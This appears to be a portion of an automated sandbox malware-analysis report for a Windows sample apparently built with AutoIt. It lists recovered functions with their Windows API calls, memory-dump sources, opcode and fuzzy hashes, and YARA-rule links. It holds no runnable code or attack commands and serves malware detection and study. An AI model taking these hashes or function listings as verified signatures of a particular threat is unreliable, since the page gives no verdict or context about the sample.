String ID:
API String ID: 614378929-0
Opcode ID: 5158ef3f10cba58bd230e31915e216c5ea81c5f8a6f24d6832e43f53f5b80438
Instruction ID: c804e446ff256f9b6ac454030bb47b43e11de523cd9c1e1e86200ad45307ef8c
Opcode Fuzzy Hash: 5158ef3f10cba58bd230e31915e216c5ea81c5f8a6f24d6832e43f53f5b80438
Instruction Fuzzy Hash: 81113A31548622AFDB313F70AC056AE3BDBAF05361F205529FC488A352DB30CC8486D4

Function 0067058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006705AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006705C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006705DD
FreeLibrary.KERNEL32(?), ref: 00670632

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 4c3506d91f9eddc286f7182df33dc63f6f28e63dffd120bb35711352b59dc00c
Instruction ID: 06fb36d00aa42de8ceb5104e4156bfb10ce822c67689e0dce9f7202cebbf47d8
Opcode Fuzzy Hash: 4c3506d91f9eddc286f7182df33dc63f6f28e63dffd120bb35711352b59dc00c
Instruction Fuzzy Hash: 70217CB1900209FFEB20CF95DCA8ADABBBAEF40700F00C56DE51A96150E770EA55DF60

Function 00676713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00676733
_memset.LIBCMT ref: 00676754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006767A6
CloseHandle.KERNEL32(00000000), ref: 006767AF

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: b507b82ebeb5c54c6ee47fef28290ff2a726378d97df8b45907cf339029d19b4
Instruction ID: a02f858b4c367d0c1bc0e378d91edc98a1311d22acd994526691c3c798d00af7
Opcode Fuzzy Hash: b507b82ebeb5c54c6ee47fef28290ff2a726378d97df8b45907cf339029d19b4
Instruction Fuzzy Hash: 4011CAB59012287AE73057A5AC4DFEBBBBDEF44764F10429AF508E71D0D2744F808B64

Function 0066B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0066AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0066AA79
Part of subcall function 0066AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0066AA83
Part of subcall function 0066AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0066AA92
Part of subcall function 0066AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0066AA99
Part of subcall function 0066AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0066AAAF

GetLengthSid.ADVAPI32(?,00000000,0066ADE4,?,?), ref: 0066B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0066B227
HeapAlloc.KERNEL32(00000000), ref: 0066B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0066B247

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 8342482d5ef92bc01f46b544a923d8f6ca0355bb1ae0815de0073e6f8f40ccc5
Instruction ID: 5ed6c98f4f4b42abc12ded19b8b6f4c60cc27bdb09fe8748726f22090674f1f4
Opcode Fuzzy Hash: 8342482d5ef92bc01f46b544a923d8f6ca0355bb1ae0815de0073e6f8f40ccc5
Instruction Fuzzy Hash: 5F118272A00205EFDB149F98DC95ABEB7EEEF85304B14A06DE542D7210D7319E84CB10

Function 0066B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0066B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0066B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0066B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0066B4DB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e6d544bcea0b875cc81a543db55de585c394c4ce473dc0194d8a30ada9e60ba3
Instruction ID: 004e0ce262d513811634ffa5ec84c54ebbadb3031ebfba5f380808a43e195266
Opcode Fuzzy Hash: e6d544bcea0b875cc81a543db55de585c394c4ce473dc0194d8a30ada9e60ba3
Instruction Fuzzy Hash: C811487A900218FFDB11DFA8C881E9DBBB9FB48700F204091EA04B7294DB71AE51DB94

Function 0064B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0064B5A5
GetClientRect.USER32(?,?), ref: 006AE69A
GetCursorPos.USER32(?), ref: 006AE6A4
ScreenToClient.USER32(?,?), ref: 006AE6AF

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 62c1aefa986aa9d16a839db3c4124e03dcdacede45b6911c87b8474fa2757427
Instruction ID: a31c6cc21bfbd6ddc4da329f24676dc68ffdda40d1b4a79ad0b79b7ebdc04c68
Opcode Fuzzy Hash: 62c1aefa986aa9d16a839db3c4124e03dcdacede45b6911c87b8474fa2757427
Instruction Fuzzy Hash: 36110A7250002AFBCB14EF54DD459EEB7BAEB0A304F101455E901E7141E734EA91CBA5

Function 0067732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00677352
MessageBoxW.USER32(?,?,?,?), ref: 00677385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0067739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006773A2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 34310222e4be9ed4134afeabbc66c08d221adae458383f9ca7d187591ff28bf7
Instruction ID: 7aa8a33bb7ce237ff9219f1bbb22eca5cfd6bb5a11428dc54369a571cceac1d7
Opcode Fuzzy Hash: 34310222e4be9ed4134afeabbc66c08d221adae458383f9ca7d187591ff28bf7
Instruction Fuzzy Hash: 6D1108B2A04214FFC7019B6CDC05AEE7BAF9B45320F044315F925D3361E6708E0087A0

Function 0064D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0064D1BA
GetStockObject.GDI32(00000011), ref: 0064D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0064D1D8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d32e7332231fa7c4d5e9c55cd8fd1cae4f6040cf5bd8de632031d8800c35a7b4
Instruction ID: f42a1deb0b4715a739937bfb24af3574d5dc9c492d100dcb78ce36b8c73e289f
Opcode Fuzzy Hash: d32e7332231fa7c4d5e9c55cd8fd1cae4f6040cf5bd8de632031d8800c35a7b4
Instruction Fuzzy Hash: C211ADB2901509BFEF025F909C50EEABB6BFF093A4F040216FE0456150DB329CA0DBA0

Function 00664DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00664E16

Part of subcall function 006654F5: __fltout2.LIBCMT ref: 0066551E

__cftog_l.LIBCMT ref: 00664E3C
__cftoe_l.LIBCMT ref: 00664E6E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: fcad542f35fab120e5113530548ba75056d9c0544ff9069aca0d92cc106a2dd1
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 3A01483200014ABBCF565E84DC168EE3F63BB18390F588459FA2959131DB37DAB2EB85

Function 00657452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00657A0D: __getptd_noexit.LIBCMT ref: 00657A0E

__lock.LIBCMT ref: 0065748F
InterlockedDecrement.KERNEL32(?), ref: 006574AC
_free.LIBCMT ref: 006574BF
InterlockedIncrement.KERNEL32(012C4698), ref: 006574D7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: da4c504ca1d263b56a4fadfded661ae6aabd5b47eb571b5194c9ed3a09aff7c9
Instruction ID: ac14ebf4a663f009c03d4eec367e13457decd01b4e25f2b5f65a9e112a09d0f6
Opcode Fuzzy Hash: da4c504ca1d263b56a4fadfded661ae6aabd5b47eb571b5194c9ed3a09aff7c9
Instruction Fuzzy Hash: 7F0126319067619BC761AF65B50939DBBA3BF05B23F154009FC14AB380CB306949CFC6

Function 0069EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0064AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0064AFE3
Part of subcall function 0064AF83: SelectObject.GDI32(?,00000000), ref: 0064AFF2
Part of subcall function 0064AF83: BeginPath.GDI32(?), ref: 0064B009
Part of subcall function 0064AF83: SelectObject.GDI32(?,00000000), ref: 0064B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0069EA8E
LineTo.GDI32(00000000,?,?), ref: 0069EA9B
EndPath.GDI32(00000000), ref: 0069EAAB
StrokePath.GDI32(00000000), ref: 0069EAB9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7c6ea4cfc489dd17b4f717083cd052c48a9526c1aeaa45b685abdbad2b227a56
Instruction ID: eb0ee8b1e56d154a289e4928b638a505f0b0925a6b2fb6900269e63931ecde69
Opcode Fuzzy Hash: 7c6ea4cfc489dd17b4f717083cd052c48a9526c1aeaa45b685abdbad2b227a56
Instruction Fuzzy Hash: DAF0823104525ABBDF12AF94AC0DFCE3F1BAF16311F085201FE11691F187755691CB99

Function 0066C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0066C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0066C85D
GetCurrentThreadId.KERNEL32 ref: 0066C864
AttachThreadInput.USER32(00000000), ref: 0066C86B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 5925771c2507a58013ea8e44b5cb975171d2fbdae8e24c550f8c53a3fc6e3f7b
Instruction ID: ff4e2dfa986d3b7299e0f3230f0fb8b033573b12fb5b082b1eeead6ef53af5f2
Opcode Fuzzy Hash: 5925771c2507a58013ea8e44b5cb975171d2fbdae8e24c550f8c53a3fc6e3f7b
Instruction Fuzzy Hash: 24E06DB1141228BADB201BA2DC0DEEB7F1EEF067B1F408125B60D99460E6B1C5C1DBE0

Function 0066B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0066B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0066AC9D), ref: 0066B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0066AC9D), ref: 0066B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0066AC9D), ref: 0066B0F1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a67552aed237577d1d251aae627989f99f91d937722245385829688473518988
Instruction ID: 89e8de793886a4dd9378fe303485b553e618b5797e8eb8ecc14619a50a34eaa0
Opcode Fuzzy Hash: a67552aed237577d1d251aae627989f99f91d937722245385829688473518988
Instruction Fuzzy Hash: AEE086B6641212DBD7202FB15C0CF873BAEEF95791F019928F641DE040FB348481CB60

Function 0064B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0064B496
SetTextColor.GDI32(?,000000FF), ref: 0064B4A0
SetBkMode.GDI32(?,00000001), ref: 0064B4B5
GetStockObject.GDI32(00000005), ref: 0064B4BD
GetWindowDC.USER32(?,00000000), ref: 006ADE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 006ADE38
GetPixel.GDI32(00000000,?,00000000), ref: 006ADE51
GetPixel.GDI32(00000000,00000000,?), ref: 006ADE6A
GetPixel.GDI32(00000000,?,?), ref: 006ADE8A
ReleaseDC.USER32(?,00000000), ref: 006ADE95

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: fcebc5bc8d7ad4d63d73be5bcd6ee506505185a63fc492dd5343d12526d2e92d
Instruction ID: 1c4cb38f866c6a8b97d86761136c6fea5adb768d3a600649b92f04235892b64d
Opcode Fuzzy Hash: fcebc5bc8d7ad4d63d73be5bcd6ee506505185a63fc492dd5343d12526d2e92d
Instruction Fuzzy Hash: 90E0ED75100240AADB216B68EC09BD87B22AB5233AF14D766F66A9C0E5D7718981DF11

Function 0066B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0066B2DF
UnloadUserProfile.USERENV(?,?), ref: 0066B2EB
CloseHandle.KERNEL32(?), ref: 0066B2F4
CloseHandle.KERNEL32(?), ref: 0066B2FC

Part of subcall function 0066AB24: GetProcessHeap.KERNEL32(00000000,?,0066A848), ref: 0066AB2B
Part of subcall function 0066AB24: HeapFree.KERNEL32(00000000), ref: 0066AB32

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 013d806b51c7093953a963a983c399dc60aa9e987c522f2b7410a57669f379fd
Instruction ID: 047baa9a2fe2767c16d91989600687b7cc7fa4051e2bb5438dd586bbad06f940
Opcode Fuzzy Hash: 013d806b51c7093953a963a983c399dc60aa9e987c522f2b7410a57669f379fd
Instruction Fuzzy Hash: 82E0B67A104005BBCB012FA5EC08859FBA7FF893613149322F62585571DB32A8B1EF91

Function 006AB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006AB29A
GetDC.USER32(00000000), ref: 006AB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006AB2C3
ReleaseDC.USER32 ref: 006AB2E2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: dbbaf13b43ba2e0220db610cfab69bddf4e1fc37090c044f940f2cfab1f7676d
Instruction ID: 4e1d3567648674cffc36511980b95b7589d1fc803b98ffe68a0d947902390469
Opcode Fuzzy Hash: dbbaf13b43ba2e0220db610cfab69bddf4e1fc37090c044f940f2cfab1f7676d
Instruction Fuzzy Hash: F0E04FF5500204EFDB005F70C84866D7BA6EB4C350F11E91AFC5A8B211FB7498818F50

Function 006AB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006AB2AE
GetDC.USER32(00000000), ref: 006AB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006AB2C3
ReleaseDC.USER32 ref: 006AB2E2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 334c3efc5ff2b23b1fc0ef2209e4ffdb062efeddde07149dcf083eb8b5736553
Instruction ID: b792e4a3dcfcd9ea5e8c5f83c89d692a39eac81a61b20fb081fa3f9d35e02591
Opcode Fuzzy Hash: 334c3efc5ff2b23b1fc0ef2209e4ffdb062efeddde07149dcf083eb8b5736553
Instruction Fuzzy Hash: 71E046F5900200EFDB005F70C88866D7BAAEB4C390F11AA1AFD5A8B210FB7898818B10

Function 0066DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0066DEAA

Strings

AutoIt3GUI, xrefs: 0066DE22
Container, xrefs: 0066DE29

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 46ce93d97a6e5885a507bb33c91a9fa515ab00e9abfb11d95430c3d5214f8ad5
Instruction ID: 6f6d67de346a90f916e0dc2d09a9aa9bfab924b21f40c7e611d24b9c73d7a8d5
